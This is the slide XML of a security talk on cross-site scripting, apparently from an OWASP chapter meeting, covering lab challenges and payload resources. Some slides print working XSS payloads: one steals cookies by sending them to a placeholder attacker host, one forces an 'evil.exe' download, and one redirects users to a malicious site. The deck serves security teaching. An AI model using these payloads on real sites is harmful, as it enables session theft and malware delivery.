        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24766571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0691-3C95-4F20-8B3F-8F515109C8B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Challenge Stored Low - Med</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3633AA65-359D-4DE7-8F94-FA58B15039C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3386262" y="1600200"/>
            <a:ext cx="5419475" cy="4525963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="291747289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3B4D-8D98-4C9A-A8EC-010F77F67E1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Challenge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mutillidae</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Password Gen</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5AA2FC2-BEFD-43C4-A74F-2AFC9EECC6AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2760734" y="1600200"/>
            <a:ext cx="6670532" cy="4525963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25246613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DAE6-273F-4949-80FE-29F507AC8121}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS - Payloads</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F55478B0-7B15-4A97-A125-A076EABF59D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>XSS-WITH-CONTEXT-JHADDIX</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Double Encoding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>OWAP Evasion Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>XSS Rocks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>HTML5 Security cheat sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Get All the Payloads</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="296490785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XSS - Payloads</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58503988-C481-4C43-8774-3DEC861BFA59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1356852"/>
            <a:ext cx="12411075" cy="5501148"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Polyglots</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>JackMasa’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> XSS Mind map</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/jhaddix/XSS.png</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63CDA30B-29B1-401E-B896-246947E7D7CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4687720" y="876415"/>
            <a:ext cx="6957545" cy="1466149"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A752E919-0BC0-4C55-BFC0-503E27B3BDA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4888389" y="4181475"/>
            <a:ext cx="6998811" cy="2490275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21533938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8A507-53F2-4E14-8913-064E22BD9734}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Payload</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1AFC5FA-F98A-405A-AF54-E0DEE9607FB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="276225" y="1600201"/>
            <a:ext cx="11315700" cy="4876799"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>JSF*ck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>- is an esoteric and educational programming style based on the atomic parts of JavaScript. It uses only six different characters to write and execute code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>It does not depend on a browser, so you can even run it on Node.js.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Decoder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </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A724ECCC-17EC-4622-BEE6-2BAD30F39D1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251151" y="2990850"/>
            <a:ext cx="5737649" cy="3686175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3262931B-16E9-4D8D-9399-0819F6D8E3AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428625" y="3429000"/>
            <a:ext cx="5886450" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+ SNIP….</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3604597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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OWAP – PA Chapter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73DC3F4E-E012-4663-940B-9070225DE334}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="494951" y="1459684"/>
            <a:ext cx="11383860" cy="5322115"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Founded by Nathan Cooper and Joe Oriel, 2018</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Chapter Goals – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create an environment where professionals can get together and discuss, collaborate, and share knowledge</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Discussions Topics -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Dev Ops, IOT, Security, Development, Best Practices, Automation, Web Applications, Mobile, Forensics, Architecture, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>OWASP -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> Central Pennsylvania</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to receive updates about our chapter send an email to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{763A7A12-C159-49CC-8E3A-33FD950BAAFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="639427" y="6019020"/>
            <a:ext cx="10400484"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3"/>
              </a:rPr>
              <a:t>central-pennsylvania-chapter+subscribe@owasp.org</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13041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Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{425B7693-4E53-4FD3-87A5-3BEA749F5CBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="234892" y="1600201"/>
            <a:ext cx="11753908" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>XSS could allow attackers to </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookie Stealing XSS: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>('&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="http://&lt;Your IP&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Stealer.php?cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=' %2B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> %2B '" /&gt;');&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5"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140</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363260620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Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{425B7693-4E53-4FD3-87A5-3BEA749F5CBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="92279" y="1600201"/>
            <a:ext cx="11896521" cy="4756150"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>XSS could allow attackers to </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Forcing the Download of a File: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;script&gt;var link = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>('a'); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>link.href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = 'http://site.com/evil.exe'; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>link.download</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = ''; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.body.appendChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(link); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>link.click</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>();&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5"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141</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1696263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Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{425B7693-4E53-4FD3-87A5-3BEA749F5CBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>XSS could allow attackers to </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Redirecting User: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = "http://evil.site.com";&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5"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142</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8899334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Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{425B7693-4E53-4FD3-87A5-3BEA749F5CBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>XSS could allow attackers to Enable Key Loggers, Take Pictures, and More:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Exploit Payload Examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:hlinkClick r:id="rId4"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Nettitude – XSS Exploit Payloads</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BeEF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:hlinkClick r:id="rId4"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5"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143</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85578518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1562-088F-4F36-AC3D-7C0DB81953C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Demo - Session Hijacking -  Stored XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
